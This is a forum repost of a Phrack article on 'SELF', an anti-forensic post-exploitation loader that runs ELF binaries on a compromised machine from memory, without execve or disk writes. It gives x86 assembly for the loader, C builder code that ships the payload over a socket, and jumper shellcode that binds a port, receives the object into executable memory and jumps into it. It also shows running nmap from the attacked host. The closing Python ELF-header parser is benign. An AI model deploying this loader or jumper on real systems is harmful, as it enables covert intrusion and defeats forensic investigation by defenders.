Nytro, posted August 15, 2013

Advanced Antiforensics : SELF

                             ==Phrack Inc.==

              Volume 0x0b, Issue 0x3f, Phile #0x0b of 0x14

|=----------------=[ Advanced Antiforensics : SELF ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ Pluf & Ripe ]=------------------------------=|
|=-----------------------[ www.7a69ezine.org ]=--------------------------=|


    1 - Introduction
    2 - Userland Execve
    3 - Shellcode ELF loader
    4 - Design and Implementation
      4.1 - The lxobject
        4.1.1 - Static ELF binary
        4.1.2 - Stack context
        4.1.3 - Shellcode loader
      4.2 - The builder
      4.3 - The jumper
    5 - Multiexecution
      5.1 - Gits
    6 - Conclusion
    7 - Greetings
    8 - References
    A - Tested systems
    B - Sourcecode


---[ 1 - Introduction

Techniques for exploiting remote services have made substantial progress.
At the same time, the range of shellcodes has grown and now incorporates
new and complex anti-detection techniques such as polymorphism.

In spite of the advantages all of this gives attackers, a call to the
execve syscall is still needed, and that gives rise to a series of
problems:

  - Access to the execve syscall may be denied if the host uses some kind
    of modern protection system.

  - The call to execve requires the file being executed to exist on the
    hard disk. Consequently, if '/bin/sh' does not exist, which is common
    in chroot environments, the shellcode will not run properly.

  - The host may lack tools that the intruder needs, which creates the
    need to upload them, and that can leave traces of the intrusion on
    the disk.

Hence the need for a shellcode that solves these problems. The solution
is found in the 'userland exec'.


---[ 2 - Userland Execve

The procedure that allows the local execution of a program while avoiding
the execve syscall is called 'userland exec' or 'userland execve'.
It's basically a mechanism that simulates, correctly and in order, most
of the procedures the kernel follows to load an executable file into
memory and start its execution. It can be summarized in just three steps:

  - Load the binary's required sections into memory.
  - Initialize the stack context.
  - Jump to the entry point (starting point).

The main aim of the 'userland exec' is to load binaries without using the
kernel's execve syscall, which solves the first of the problems stated
above. At the same time, since it is our own implementation, we can adapt
its features to our needs. We'll make it so the ELF file is not read from
the hard disk but from another medium, such as a socket. With this
procedure the other two problems stated before are solved as well, because
the file '/bin/sh' doesn't need to be visible to the exploited process but
can be read from the net. Likewise, tools that don't reside on the
destination host can also be executed.

The first public implementation of an execve in a user environment was
made by "the grugq" [1]. Its coding and inner workings are perfect, but it
has some disadvantages:

  - Doesn't work for real attacks.
  - The code is too large and difficult to port.

Because of that, we decided to put our efforts into developing another
'userland execve' with the same features but with simpler code and
oriented to use in exploits. The final result is the 'shellcode ELF
loader'.


---[ 3 - Shellcode ELF loader

The shellcode ELF loader, or Self, is a new and sophisticated
post-exploitation technique based on the userland execve. It allows
loading and executing a binary ELF file on a remote machine without
storing it on disk or modifying the original filesystem. The goal of the
shellcode ELF loader is to provide an effective and modern
post-exploitation anti-forensic system for exploits, combined with ease
of use.
That is, an intruder can execute as many applications as he desires.


---[ 4 - Design and Implementation

Obtaining an effective design hasn't been an easy task; different options
were considered and most of them were dropped. In the end we selected the
most creative design, the one that allows the most flexibility and
portability and is the easiest to use.

The final result is a mix of multiple pieces, independent of one another,
that each perform their own function and work together in harmony. There
are three of these pieces: the lxobject, the builder and the jumper.
These elements make the task of executing a binary on a remote machine
quite easy. The lxobject is a special kind of object that contains all
the elements required to replace the original executable of a guest
process with a new one. The builder and the jumper are the pieces of code
that build the lxobject, transfer it from the local machine (attacker) to
the remote machine (attacked) and activate it.

Before describing the inner details of this technique, it is necessary to
understand how, when and where it must be used. Here follows a short
summary of its common use:

  - 1st round, exploitation of a vulnerable service:

    In the 1st round we have a machine X with a vulnerable service Y. We
    want to exploit this juicy process, so we use a suitable exploit with
    the jumper as its payload (shellcode). Once the service is exploited,
    the jumper is executed and we're ready for the next round.

  - 2nd round, execution of a binary:

    Here is where the shellcode ELF loader takes part; a binary ELF is
    selected and the lxobject is constructed. Then we send it to the
    jumper to be activated. The result is the load and execution of the
    binary on the remote machine. We win the battle!!


---[ 4.1 - The lxobject

What the hell is that?
An lxobject is a self-loadable and self-executable object, that is to
say, an object specially devised to completely replace the original guest
process where it is located with the binary ELF file that it carries, and
to start that binary's execution. Each lxobject is built on the
intruder's machine using the builder and is sent to the attacked machine,
where the jumper receives and activates it.

It can therefore be compared to a missile that is sent from one place to
the impact point, the explosive charge being an executable. This missile
is built from three assembled parts: a static ELF binary, a preconstructed
stack context and a shellcode loader.


---[ 4.1.1 - Static ELF binary

It's the first piece of an lxobject: the binary ELF that must be loaded
and executed on a remote host. It's just a common executable file,
statically compiled for the architecture and system on which it will be
executed.

We decided to avoid dynamic executables because they would add unneeded
complexity to the loading code, noticeably raising the rate of possible
errors.


---[ 4.1.2 - Stack context

It's the second piece of an lxobject: the stack context that the binary
will need. Every process has an associated memory segment called the
stack, where functions store their local variables. During the binary
load process, the kernel fills this segment with a series of initial data
required for its subsequent execution. We call it the 'initial stack
context'.

To ease portability, and especially the loading process, a preconstructed
stack context was adopted. That is to say, it is generated on our machine
and assembled together with the binary ELF file. The only knowledge
required is the format, so that the data is added in the correct order.
On the vast majority of UNIX systems it looks like this:

                     .----------------.
               .--> |    alignment   |
               |    |================|
               |    |      Argc      | - Arguments (number)
               |    |----------------|
               |    |     Argv[]     | ---.     - Arguments (vector)
               |    |----------------|    |
               |    |     Envp[]     | ---|---. - Environment variables
               |    |----------------|    |   |   (vector)
               |    |  argv strings  | <--'   |
               |    |----------------|        | - Argv and envp data
               |    |  envp strings  | <------'   (strings)
               |    |================|
               '--- |    alignment   | -------> Upper and lower alignments
                    '----------------'

This is the most reduced yet functional stack context available to us. As
can be observed, no auxiliary vector has been added, because working with
static executables removes the need to worry about linking. Also, there is
no restriction on the number of arguments and environment variables
allowed; a bunch of them increases the context's size but nothing more.

As the context is built on the attacker's machine, which will usually
differ from the attacked one, knowledge of the address space in which the
stack is placed is required. This is handled automatically and doesn't
pose a problem.


---[ 4.1.3 - Shellcode Loader

This is the third and also the most important part of an lxobject. It's a
shellcode that carries out the loading and execution of a binary file. It
is really a simple but powerful implementation of userland execve().

The loading process takes the following steps to complete successfully
(x86 32 bits):

  * pre-loading: first, the jumper must do some operations before anything
    else. It gets the memory address where the lxobject has previously
    been stored and pushes it onto the stack, then it finds the loader
    code and jumps to it. The loading has begun.

        __asm__(
            "push %0\n"
            "jmp *%1"
            :
            : "c"(lxobject),"b"(*loader)
        );

  * loading step 1: scans the program header table and begins to load
    each PT_LOAD segment.
    The stack context has its own header, PT_STACK, so when this kind of
    segment is found it is treated differently from the rest (step 2).

        .loader_next_phdr:
            // Check program header type (eax): PT_LOAD or PT_STACK
            movl    (%edx),%eax

            // If program header type is PT_LOAD, jump to
            // .loader_phdr_load and load the segment referenced by
            // this header
            cmpl    $PT_LOAD,%eax
            je      .loader_phdr_load

            // If program header type is PT_STACK, jump to
            // .loader_phdr_stack and load the new stack segment
            cmpl    $PT_STACK,%eax
            je      .loader_phdr_stack

            // If unknown type, jump to next header
            addl    $PHENTSIZE,%edx
            jmp     .loader_next_phdr

    For each PT_LOAD segment (text/data) do the following:

  * loading step 1.1: unmap the old segment, one page at a time, to be
    sure that there is enough room to fit the new one:

            movl    PHDR_VADDR(%edx),%edi
            movl    PHDR_MEMSZ(%edx),%esi
            subl    $PG_SIZE,%esi
            movl    $0,%ecx

        .loader_unmap_page:
            pushl   $PG_SIZE
            movl    %edi,%ebx
            andl    $0xfffff000,%ebx
            addl    %ecx,%ebx
            pushl   %ebx
            pushl   $2
            movl    $SYS_munmap,%eax
            call    do_syscall
            addl    $12,%esp
            addl    $PG_SIZE,%ecx
            cmpl    %ecx,%esi
            jge     .loader_unmap_page

  * loading step 1.2: map the new memory region.

            pushl   $0
            pushl   $0
            pushl   $-1
            pushl   $MAPS
            pushl   $7
            movl    PHDR_MEMSZ(%edx),%esi
            pushl   %esi
            movl    %edi,%esi
            andl    $0xfffff000,%esi
            pushl   %esi
            pushl   $6
            movl    $SYS_mmap,%eax
            call    do_syscall
            addl    $32,%esp

  * loading step 1.3: copy the segment from the lxobject to that place:

            movl    PHDR_FILESZ(%edx),%ecx
            movl    PHDR_OFFSET(%edx),%esi
            addl    %ebp,%esi
            repz movsb

  * loading step 1.4: continue with the next header:

            addl    $PHENTSIZE,%edx
            jmp     .loader_next_phdr

  * loading step 2: when both text and data segments have been loaded
    correctly, it's time to set up a new stack:

        .loader_phdr_stack:
            movl    PHDR_OFFSET(%edx),%esi
            addl    %ebp,%esi
            movl    PHDR_VADDR(%edx),%edi
            movl    PHDR_MEMSZ(%edx),%ecx
            repz movsb

  * loading step 3: to finish, some registers are cleaned and then the
    loader jumps to the binary's entry point or _init().
        .loader_entry_point:
            movl    PHDR_ALIGN(%edx),%esp
            movl    EHDR_ENTRY(%ebp),%eax
            xorl    %ebx,%ebx
            xorl    %ecx,%ecx
            xorl    %edx,%edx
            xorl    %esi,%esi
            xorl    %edi,%edi
            jmp     *%eax

  * post-loading: the execution has begun.

As can be seen, the loader doesn't go through any process to build the
stack context; it is constructed in the builder. This way a pre-designed
context is available and simply has to be copied to the right address
inside the process.

Although a different loader has to be coded for each architecture, the
operations are plain and concrete. Where possible, hybrid loaders should
be designed, able to run on the same architecture under the different
syscall conventions of UNIX systems. The loader we have developed for our
implementation is a hybrid code capable of working under Linux and BSD
systems on x86/32-bit machines.


---[ 4.2 - The builder

Its mission is to assemble the components of an lxobject and then send it
to a remote machine. It works with a simple command line design and its
format is as follows:

    ./builder <host> <port> <exec> <argv> <envp>

where:

    host, port = the attacked machine's address and the port where the
                 jumper is running and waiting

    exec       = the executable binary file we want to execute

    argv, envp = string of arguments and string of environment variables
                 needed by the executable binary

For instance, if we want to do some port scanning from the attacked host,
we will execute an nmap binary as follows:

    ./builder <host> 2002 nmap-static "-P0;-p;23;172.26.1-30" "PATH=/bin"

Basically, the assembly operations performed are the following:

  * allocate enough memory to store the executable binary file, the
    shellcode loader and the stack's init context.

        elf_new = (void*)malloc(elf_new_size);

  * insert the executable into the memory area previously allocated and
    then clear the fields that describe the section header table, because
    they are of no use to us when working with a static file. The section
    header table itself could also be removed.
        ehdr_new->e_shentsize = 0;
        ehdr_new->e_shoff = 0;
        ehdr_new->e_shnum = 0;
        ehdr_new->e_shstrndx = 0;

  * build the stack context. It requires two strings: the first one
    contains the arguments and the second one the environment variables.
    Items are separated by a delimiter. For instance:

        <argv> = "arg1;arg2;arg3;-h"
        <envp> = "PATH=/bin;SHELL=sh"

    Once the context has been built, a new program header is added to the
    binary's program header table. This is a PT_STACK header and contains
    all the information the shellcode loader needs in order to set up the
    new stack.

  * the shellcode ELF loader is inserted and its offset is saved within
    the e_ident field in the ELF header.

        memcpy(elf_new + elf_new_size - PG_SIZE + LOADER_CODESZ,
               loader, LOADER_CODESZ);
        ldr_ptr = (unsigned long *)&ehdr_new->e_ident[9];
        *ldr_ptr = elf_new_size - PG_SIZE + LOADER_CODESZ;

  * the lxobject is ready; now it's sent to the specified host and port.

        connect(sfd, (struct sockaddr *)&srv, sizeof(struct sockaddr));
        write(sfd, elf_new, elf_new_size);

An lxobject that is finished and correctly assembled, ready to be sent,
looks like this:

      [ Autoloadable and Autoexecutable Object ]
.------------------------------------------------
|
|       [ Static Executable File (1) ]
|   .--------------------------------.
|   |                                |
|   |    .----------------------.    |
|   |    |      ELF Header      )----|----|--.
|   |    |----------------------|    |    |  Shellcode Elf loader (3)
|   |    | Program Header Table |    |    |  hdr->e_ident[9]
|   |    |                      |    |    |
|   |    |  + PT_LOAD0          |    |    |
|   |    |  + PT_LOAD1          |    |    |
|   |    |  ...                 |    |    |
|   |    |  ...                 |    |    |
|   |    |  + PT_STACK          )----|----|--|--.
|   |    |                      |    |    |  |  Stack Context (2)
|   |    |----------------------|    |    |  |
|   |    | Sections (code/data) |    |    |  |
|   '--> |----------------------| <--'    |  |
|   .--> |######################| <-------'  |
|   |    |## SHELLCODE LOADER ##|            |
| P |    |######################|            |
| A |    |                      |            |
| G |    |       .......        |            |
| E |    |       .......        |            |
|   |    |                      |            |
|   |    |######################| <----------'
|   |    |#### STACK CONTEXT ###|
|   |    |######################|
|   '--> '----------------------'
|
'------------------------------------------------


---[ 4.3 - The jumper

It is the shellcode that has to be used by an exploit during the
exploitation of a vulnerable service. Its purpose is to activate the
incoming lxobject, and to achieve that at least the following operations
must be done:

  - open a socket and wait for the lxobject to arrive
  - store it somewhere in memory
  - activate it by jumping into the loader

Those are the minimal required actions, but it is important to keep in
mind that a jumper is a simple shellcode, so any other functionality can
be added before them: breaking a chroot, elevating privileges, and so on.

1) how to get the lxobject?

   It is easily achieved: already known techniques can be applied, such as
   binding to a port and waiting for new connections, or searching the
   process' FD table for descriptors that belong to a socket.
   Additionally, cipher algorithms can be added, but this would lead to
   huge shellcodes that are difficult to use.

2) and where to store it?

   There are three possibilities:

   a) store it in the heap. We just have to find the current location of
      the program break by using brk(0). However, this method is dangerous
      and unsuitable because the lxobject could be unmapped or even
      entirely overwritten during the loading process.

   b) store it in the process stack. Provided there is enough space and we
      know where the stack starts and finishes, this method can be used,
      but the stack may not be executable, in which case it can't be
      applied.

   c) store it in a newly mapped memory region by using the mmap()
      syscall. This is the best way and the one we have used in our code.

Due to the nature of a jumper, its code can be customized and adapted to
many different contexts.
An example of a generic jumper written in C follows:

    lxobject = (unsigned char*)mmap(0, LXOBJECT_SIZE,
                   PROT_READ|PROT_WRITE|PROT_EXEC,
                   MAP_PRIVATE|MAP_ANON, -1, 0);

    addr.sin_family = AF_INET;
    addr.sin_port = htons(atoi(argv[1]));
    addr.sin_addr.s_addr = 0;

    sfd = socket(AF_INET, SOCK_STREAM, 0);
    bind(sfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
    listen(sfd, 10);
    nsfd = accept(sfd, NULL, NULL);

    for (i = 0 ; i < 255 ; i++) {
        if (recv(i, tmp, 4, MSG_PEEK) == 4) {
            if (!strncmp(&tmp[1], "ELF", 3))
                break;
        }
    }

    recv(i, lxobject, MAX_OBJECT_SIZE, MSG_WAITALL);

    loader = (unsigned long *)&lxobject[9];
    *loader += (unsigned long)lxobject;

    __asm__(
        "push %0\n"
        "jmp *%1"
        :
        : "c"(lxobject),"b"(*loader)
    );


---[ 5 - Multiexecution

The code included in this article is just a generic implementation of a
shellcode ELF loader, which allows one execution of a binary at a time.
If we want to execute that binary an arbitrary number of times (to pass
more arguments, test new features, etc.), a new lxobject has to be built
and sent for each try. Although this obviously has some disadvantages,
it's enough for most situations. But what happens if what we really want
is to execute our binary many times from the other side, that is, from
the remote machine, without rebuilding the lxobject?

To face this issue we have developed another technique called
"multi-execution". Multi-execution is a much more advanced derived
implementation. Its main feature is that the process of building an
lxobject is always done on the remote machine, so one binary allows
unlimited executions. It is something like working with a remote shell.
One example of a tool that uses a multi-execution environment is the gits
project, or "ghost in the system".


---[ 5.1 - Gits

Gits is a multi-execution environment designed to operate on attacked
remote machines and to limit the amount of forensic evidence. It should
be viewed as a proof of concept, an advanced extension with many
features.
It comprises a launcher program and a shell, which is the main part. The
shell lets you retrieve as many binaries as desired and execute them as
many times as you wish (stack context rebuilding and binary patching are
done using some advanced techniques). Built-in commands, job control,
flow redirection, remote file manipulation and so on have also been
added.


---[ 6 - Conclusion

Forensic techniques are more sophisticated and complete every day: where
there was no trace left, now there's a fingerprint; where there was only
one piece of evidence left, now there are hundreds. It is a never-ending
battle between those who don't want to be detected and those who want to
detect. Using memory and leaving the disk untouched is a good policy to
avoid detection. The shellcode ELF loader carries out this kind of
post-exploitation plainly and elegantly.


---[ 7 - Greetings

7a69ezine crew & redbull.


---[ 8 - References

  [1] The Design and Implementation of ul_exec - the grugq
      http://securityfocus.com/archive/1/348638/2003-12-29/2004-01-04/0

  [2] Remote Exec - the grugq
      http://www.phrack.org/show.php?p=62&a=8

  [3] Ghost In The System Project
      http://www.7a69ezine.org/project/gits


---[ A - Tested systems

The following table summarizes the systems where we have tested all this
fucking shit.

                 /----------v----------\
                 |   x86    |  amd64   |
    /------------+----------+----------<
    | Linux 2.4  |  works   |  works   |
    >------------+----------+----------<
    | Linux 2.6  |  works   |  works   |
    >------------+----------+----------<
    | FreeBSD    |  works   | untested |
    >------------+----------+----------<
    | NetBSD     |  works   | untested |
    \------------^----------^----------/


---[ B - Sourcecode

Source: https://sites.google.com/site/x86pfxlab/oldstuff
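
As a small companion to the program header scan described in section
4.1.3, the following read-only Python sketch lists the PT_LOAD headers of
a 32-bit little-endian ELF image and computes the page-aligned address
range each segment covers, much like `readelf -l` would. It is not part of
the original article or its source code: the names `program_headers`,
`page_span` and `demo_image` are hypothetical, the demo header is
synthetic, and the article's own PT_STACK type is left out because its
numeric value is not given in the text. Nothing is mapped or executed.

```python
import struct

PT_LOAD = 1        # standard ELF program header type for loadable segments
PG_SIZE = 0x1000   # assumption: 4 KiB pages, as on x86/32


def program_headers(image: bytes):
    """Yield (p_type, p_offset, p_vaddr, p_filesz, p_memsz) per header."""
    if image[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if image[4] != 1 or image[5] != 1:
        raise ValueError("sketch handles 32-bit little-endian ELF only")
    # Elf32_Ehdr: e_phoff at byte 28, e_phentsize at 42, e_phnum at 44
    (e_phoff,) = struct.unpack_from("<I", image, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", image, 42)
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, align
        p_type, p_offset, p_vaddr, _, p_filesz, p_memsz, _, _ = \
            struct.unpack_from("<8I", image, base)
        yield p_type, p_offset, p_vaddr, p_filesz, p_memsz


def page_span(vaddr: int, memsz: int, page: int = PG_SIZE):
    """Return the [start, end) page-aligned range covering a segment."""
    start = vaddr & ~(page - 1)
    end = (vaddr + memsz + page - 1) & ~(page - 1)
    return start, end


def demo_image() -> bytes:
    """Build a synthetic ELF32 header with two PT_LOAD entries (no code)."""
    ident = b"\x7fELF\x01\x01\x01" + bytes(9)
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", ident, 2, 3, 1, 0x08048080,
                       52, 0, 0, 52, 32, 2, 0, 0, 0)
    text = struct.pack("<8I", PT_LOAD, 0, 0x08048000, 0x08048000,
                       0x500, 0x500, 5, PG_SIZE)
    data = struct.pack("<8I", PT_LOAD, 0x500, 0x08049500, 0x08049500,
                       0x100, 0x2340, 6, PG_SIZE)
    return ehdr + text + data


if __name__ == "__main__":
    for p_type, off, vaddr, filesz, memsz in program_headers(demo_image()):
        if p_type == PT_LOAD:
            start, end = page_span(vaddr, memsz)
            print(f"PT_LOAD off={off:#x} vaddr={vaddr:#x} "
                  f"filesz={filesz:#x} memsz={memsz:#x} "
                  f"pages={start:#x}..{end:#x}")
```

The second demo segment has a memsz larger than its filesz, which is the
usual shape of a data segment with bss; the page range is derived from
memsz, not filesz.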